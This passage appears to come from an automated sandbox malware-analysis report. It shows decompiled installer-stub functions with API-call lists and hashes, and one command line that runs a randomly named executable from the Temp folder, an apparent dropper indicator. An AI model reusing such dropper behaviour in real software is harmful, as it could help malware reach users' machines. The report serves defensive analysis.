                                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}






                                                  APIs
                                                  • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,00403579,0040CEF0,?,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004061DB(void* _a4, void* _a8, long _a12) {
                                                  				int _t7;
                                                  				long _t11;
                                                  
                                                  				_t11 = _a12;
                                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}






                                                  APIs
                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004035F8(long _a4) {
                                                  				long _t2;
                                                  
                                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                  				return _t2;
                                                  			}





                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E00401FA4() {
                                                  				void* _t9;
                                                  				char _t13;
                                                  				void* _t15;
                                                  				void* _t17;
                                                  				void* _t20;
                                                  				void* _t22;
                                                  
                                                  				_t19 = E00402DA6(_t15);
                                                  				E004056CA(0xffffffeb, _t7);
                                                  				_t9 = E00405C4B(_t19); // executed
                                                  				_t20 = _t9;
                                                  				if(_t20 == _t15) {
                                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                  						_t13 = E00406AE0(_t17, _t20); // executed
                                                  						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                  							if(_t13 != _t15) {
                                                  								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                  							}
                                                  						} else {
                                                  							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                  						}
                                                  					}
                                                  					_push(_t20);
                                                  					CloseHandle();
                                                  				}
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                  				return 0;
                                                  			}










                                                  APIs
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                    • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                    • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                    • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                    • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                    • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                  • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                  • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                  • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                  				struct HWND__* _v8;
                                                  				long _v12;
                                                  				struct tagRECT _v28;
                                                  				void* _v36;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				int _v48;
                                                  				signed int _v52;
                                                  				int _v56;
                                                  				void* _v60;
                                                  				void* _v68;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				struct HWND__* _t94;
                                                  				long _t95;
                                                  				int _t100;
                                                  				void* _t108;
                                                  				intOrPtr _t130;
                                                  				struct HWND__* _t134;
                                                  				int _t156;
                                                  				int _t159;
                                                  				struct HMENU__* _t164;
                                                  				struct HWND__* _t168;
                                                  				struct HWND__* _t169;
                                                  				int _t171;
                                                  				void* _t172;
                                                  				short* _t173;
                                                  				short* _t175;
                                                  				int _t177;
                                                  
                                                  				_t169 =  *0x429244;
                                                  				_t156 = 0;
                                                  				_v8 = _t169;
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 == 0x405) {
                                                  						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                  					}
                                                  					if(_a8 != 0x111) {
                                                  						L17:
                                                  						_t171 = 1;
                                                  						if(_a8 != 0x404) {
                                                  							L25:
                                                  							if(_a8 != 0x7b) {
                                                  								goto L20;
                                                  							}
                                                  							_t94 = _v8;
                                                  							if(_a12 != _t94) {
                                                  								goto L20;
                                                  							}
                                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                  							_a8 = _t95;
                                                  							if(_t95 <= _t156) {
                                                  								L36:
                                                  								return 0;
                                                  							}
                                                  							_t164 = CreatePopupMenu();
                                                  							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                  							_t100 = _a16;
                                                  							_t159 = _a16 >> 0x10;
                                                  							if(_a16 == 0xffffffff) {
                                                  								GetWindowRect(_v8,  &_v28);
                                                  								_t100 = _v28.left;
                                                  								_t159 = _v28.top;
                                                  							}
                                                  							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                  								_v60 = _t156;
                                                  								_v48 = 0x423748;
                                                  								_v44 = 0x1000;
                                                  								_a4 = _a8;
                                                  								do {
                                                  									_a4 = _a4 - 1;
                                                  									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                  								} while (_a4 != _t156);
                                                  								OpenClipboard(_t156);
                                                  								EmptyClipboard();
                                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                  								_a4 = _t108;
                                                  								_t172 = GlobalLock(_t108);
                                                  								do {
                                                  									_v48 = _t172;
                                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                  									 *_t173 = 0xd;
                                                  									_t175 = _t173 + 2;
                                                  									 *_t175 = 0xa;
                                                  									_t172 = _t175 + 2;
                                                  									_t156 = _t156 + 1;
                                                  								} while (_t156 < _a8);
                                                  								GlobalUnlock(_a4);
                                                  								SetClipboardData(0xd, _a4);
                                                  								CloseClipboard();
                                                  							}
                                                  							goto L36;
                                                  						}
                                                  						if( *0x42922c == _t156) {
                                                  							ShowWindow( *0x42a268, 8);
                                                  							if( *0x42a2ec == _t156) {
                                                  								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                  							}
                                                  							E0040459D(_t171);
                                                  							goto L25;
                                                  						}
                                                  						 *0x421f18 = 2;
                                                  						E0040459D(0x78);
                                                  						goto L20;
                                                  					} else {
                                                  						if(_a12 != 0x403) {
                                                  							L20:
                                                  							return E0040462B(_a8, _a12, _a16);
                                                  						}
                                                  						ShowWindow( *0x429230, _t156);
                                                  						ShowWindow(_t169, 8);
                                                  						E004045F9(_t169);
                                                  						goto L17;
                                                  					}
                                                  				}
                                                  				_v52 = _v52 | 0xffffffff;
                                                  				_v40 = _v40 | 0xffffffff;
                                                  				_t177 = 2;
                                                  				_v60 = _t177;
                                                  				_v56 = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t130 =  *0x42a270;
                                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                  				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                  				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                                  				 *0x429244 = _t134;
                                                  				_v8 = _t134;
                                                  				E004045F9( *0x429230);
                                                  				 *0x429234 = E00404F52(4);
                                                  				 *0x42924c = 0;
                                                  				GetClientRect(_v8,  &_v28);
                                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                  				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                  				if(_a8 >= 0) {
                                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                                  				}
                                                  				if(_a12 >= _t156) {
                                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                  				}
                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  				_push(0x1b);
                                                  				E004045C4(_a4);
                                                  				if(( *0x42a278 & 0x00000003) != 0) {
                                                  					ShowWindow( *0x429230, _t156);
                                                  					if(( *0x42a278 & 0x00000002) != 0) {
                                                  						 *0x429230 = _t156;
                                                  					} else {
                                                  						ShowWindow(_v8, 8);
                                                  					}
                                                  					E004045F9( *0x429228);
                                                  				}
                                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                  				if(( *0x42a278 & 0x00000004) != 0) {
                                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                  				}
                                                  				goto L36;
                                                  			}

































                                                  0x0040595e
                                                  0x00405951
                                                  0x00405956
                                                  0x00405956
                                                  0x0040596a
                                                  0x0040596a
                                                  0x0040597e
                                                  0x00405987
                                                  0x00405990
                                                  0x004059a0
                                                  0x004059ac
                                                  0x004059ac
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405867
                                                  • GetDlgItem.USER32 ref: 00405876
                                                  • GetClientRect.USER32 ref: 004058B3
                                                  • GetSystemMetrics.USER32 ref: 004058BA
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                  • ShowWindow.USER32(?,00000008), ref: 00405956
                                                  • GetDlgItem.USER32 ref: 00405977
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                  • GetDlgItem.USER32 ref: 00405885
                                                    • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                  • GetDlgItem.USER32 ref: 004059C9
                                                  • CreateThread.KERNEL32 ref: 004059D7
                                                  • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                  • ShowWindow.USER32(00000000), ref: 00405A02
                                                  • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                  • ShowWindow.USER32(00000008), ref: 00405A51
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                  • CreatePopupMenu.USER32 ref: 00405A96
                                                  • AppendMenuW.USER32 ref: 00405AAA
                                                  • GetWindowRect.USER32 ref: 00405ACA
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                  • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                  • EmptyClipboard.USER32 ref: 00405B31
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                  • GlobalLock.KERNEL32 ref: 00405B47
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                  • SetClipboardData.USER32 ref: 00405B86
                                                  • CloseClipboard.USER32 ref: 00405B8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: H7B${
                                                  • API String ID: 590372296-2256286769
                                                  • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                  • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                  • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                  • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				long _v16;
                                                  				long _v20;
                                                  				long _v24;
                                                  				char _v28;
                                                  				intOrPtr _v32;
                                                  				long _v36;
                                                  				char _v40;
                                                  				unsigned int _v44;
                                                  				signed int _v48;
                                                  				WCHAR* _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				WCHAR* _v72;
                                                  				void _v76;
                                                  				struct HWND__* _v80;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t82;
                                                  				long _t87;
                                                  				short* _t89;
                                                  				void* _t95;
                                                  				signed int _t96;
                                                  				int _t109;
                                                  				signed short _t114;
                                                  				signed int _t118;
                                                  				struct HWND__** _t122;
                                                  				intOrPtr* _t138;
                                                  				WCHAR* _t146;
                                                  				unsigned int _t150;
                                                  				signed int _t152;
                                                  				unsigned int _t156;
                                                  				signed int _t158;
                                                  				signed int* _t159;
                                                  				signed int* _t160;
                                                  				struct HWND__* _t166;
                                                  				struct HWND__* _t167;
                                                  				int _t169;
                                                  				unsigned int _t197;
                                                  
                                                  				_t156 = __edx;
                                                  				_t82 =  *0x422720;
                                                  				_v32 = _t82;
                                                  				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                  				if(_a8 == 0x40b) {
                                                  					E00405CAC(0x3fb, _t146);
                                                  					E004068EF(_t146);
                                                  				}
                                                  				_t167 = _a4;
                                                  				if(_a8 != 0x110) {
                                                  					L8:
                                                  					if(_a8 != 0x111) {
                                                  						L20:
                                                  						if(_a8 == 0x40f) {
                                                  							L22:
                                                  							_v8 = _v8 & 0x00000000;
                                                  							_v12 = _v12 & 0x00000000;
                                                  							E00405CAC(0x3fb, _t146);
                                                  							if(E0040603F(_t186, _t146) == 0) {
                                                  								_v8 = 1;
                                                  							}
                                                  							E00406668(0x421718, _t146);
                                                  							_t87 = E00406A35(1);
                                                  							_v16 = _t87;
                                                  							if(_t87 == 0) {
                                                  								L30:
                                                  								E00406668(0x421718, _t146);
                                                  								_t89 = E00405FE2(0x421718);
                                                  								_t158 = 0;
                                                  								if(_t89 != 0) {
                                                  									 *_t89 = 0;
                                                  								}
                                                  								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                  									goto L35;
                                                  								} else {
                                                  									_t169 = 0x400;
                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                  									asm("cdq");
                                                  									_v48 = _t109;
                                                  									_v44 = _t156;
                                                  									_v12 = 1;
                                                  									goto L36;
                                                  								}
                                                  							} else {
                                                  								_t159 = 0;
                                                  								if(0 == 0x421718) {
                                                  									goto L30;
                                                  								} else {
                                                  									goto L26;
                                                  								}
                                                  								while(1) {
                                                  									L26:
                                                  									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                  									if(_t114 != 0) {
                                                  										break;
                                                  									}
                                                  									if(_t159 != 0) {
                                                  										 *_t159 =  *_t159 & _t114;
                                                  									}
                                                  									_t160 = E00405F83(0x421718);
                                                  									 *_t160 =  *_t160 & 0x00000000;
                                                  									_t159 = _t160;
                                                  									 *_t159 = 0x5c;
                                                  									if(_t159 != 0x421718) {
                                                  										continue;
                                                  									} else {
                                                  										goto L30;
                                                  									}
                                                  								}
                                                  								_t150 = _v44;
                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                  								_v44 = _t150 >> 0xa;
                                                  								_v12 = 1;
                                                  								_t158 = 0;
                                                  								__eflags = 0;
                                                  								L35:
                                                  								_t169 = 0x400;
                                                  								L36:
                                                  								_t95 = E00404F52(5);
                                                  								if(_v12 != _t158) {
                                                  									_t197 = _v44;
                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                  										_v8 = 2;
                                                  									}
                                                  								}
                                                  								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                  									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                  									if(_v12 == _t158) {
                                                  										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                  									} else {
                                                  										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                  									}
                                                  								}
                                                  								_t96 = _v8;
                                                  								 *0x42a304 = _t96;
                                                  								if(_t96 == _t158) {
                                                  									_v8 = E0040140B(7);
                                                  								}
                                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                  									_v8 = _t158;
                                                  								}
                                                  								E004045E6(0 | _v8 == _t158);
                                                  								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                  									E00404A0E();
                                                  								}
                                                  								 *0x423738 = _t158;
                                                  								goto L53;
                                                  							}
                                                  						}
                                                  						_t186 = _a8 - 0x405;
                                                  						if(_a8 != 0x405) {
                                                  							goto L53;
                                                  						}
                                                  						goto L22;
                                                  					}
                                                  					_t118 = _a12 & 0x0000ffff;
                                                  					if(_t118 != 0x3fb) {
                                                  						L12:
                                                  						if(_t118 == 0x3e9) {
                                                  							_t152 = 7;
                                                  							memset( &_v76, 0, _t152 << 2);
                                                  							_v80 = _t167;
                                                  							_v72 = 0x423748;
                                                  							_v60 = E00404E0B;
                                                  							_v56 = _t146;
                                                  							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                  							_t122 =  &_v80;
                                                  							_v64 = 0x41;
                                                  							__imp__SHBrowseForFolderW(_t122);
                                                  							if(_t122 == 0) {
                                                  								_a8 = 0x40f;
                                                  							} else {
                                                  								__imp__CoTaskMemFree(_t122);
                                                  								E00405F37(_t146);
                                                  								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                  								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
                                                  									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                  									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                  										lstrcatW(_t146, 0x428200);
                                                  									}
                                                  								}
                                                  								 *0x423738 =  *0x423738 + 1;
                                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                  							}
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					if(_a12 >> 0x10 != 0x300) {
                                                  						goto L53;
                                                  					}
                                                  					_a8 = 0x40f;
                                                  					goto L12;
                                                  				} else {
                                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                                  					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                  						E00405F37(_t146);
                                                  					}
                                                  					 *0x429238 = _t167;
                                                  					SetWindowTextW(_t166, _t146);
                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                  					_push(1);
                                                  					E004045C4(_t167);
                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  					_push(0x14);
                                                  					E004045C4(_t167);
                                                  					E004045F9(_t166);
                                                  					_t138 = E00406A35(8);
                                                  					if(_t138 == 0) {
                                                  						L53:
                                                  						return E0040462B(_a8, _a12, _a16);
                                                  					} else {
                                                  						 *_t138(_t166, 1);
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  			}













































                                                  0x00404be9
                                                  0x00404bea
                                                  0x00404bf1
                                                  0x00404bfb
                                                  0x00404c03
                                                  0x00404c10
                                                  0x00404c24
                                                  0x00404c28
                                                  0x00404c28
                                                  0x00404c24
                                                  0x00404c2d
                                                  0x00404c3a
                                                  0x00404c3a
                                                  0x00404be7
                                                  0x00000000
                                                  0x00404b9f
                                                  0x00404b8d
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b93
                                                  0x00000000
                                                  0x00404afe
                                                  0x00404b0b
                                                  0x00404b14
                                                  0x00404b21
                                                  0x00404b21
                                                  0x00404b28
                                                  0x00404b2e
                                                  0x00404b37
                                                  0x00404b3a
                                                  0x00404b3d
                                                  0x00404b45
                                                  0x00404b48
                                                  0x00404b4b
                                                  0x00404b51
                                                  0x00404b58
                                                  0x00404b5f
                                                  0x00404df6
                                                  0x00404e08
                                                  0x00404b65
                                                  0x00404b68
                                                  0x00000000
                                                  0x00404b68
                                                  0x00404b5f

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404B04
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                  • lstrcmpiW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00423748,00000000,?,?), ref: 00404C1C
                                                  • lstrcatW.KERNEL32(?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i), ref: 00404C28
                                                  • SetDlgItemTextW.USER32 ref: 00404C3A
                                                    • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406952
                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406961
                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406966
                                                    • Part of subcall function 004068EF: CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406979
                                                  • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
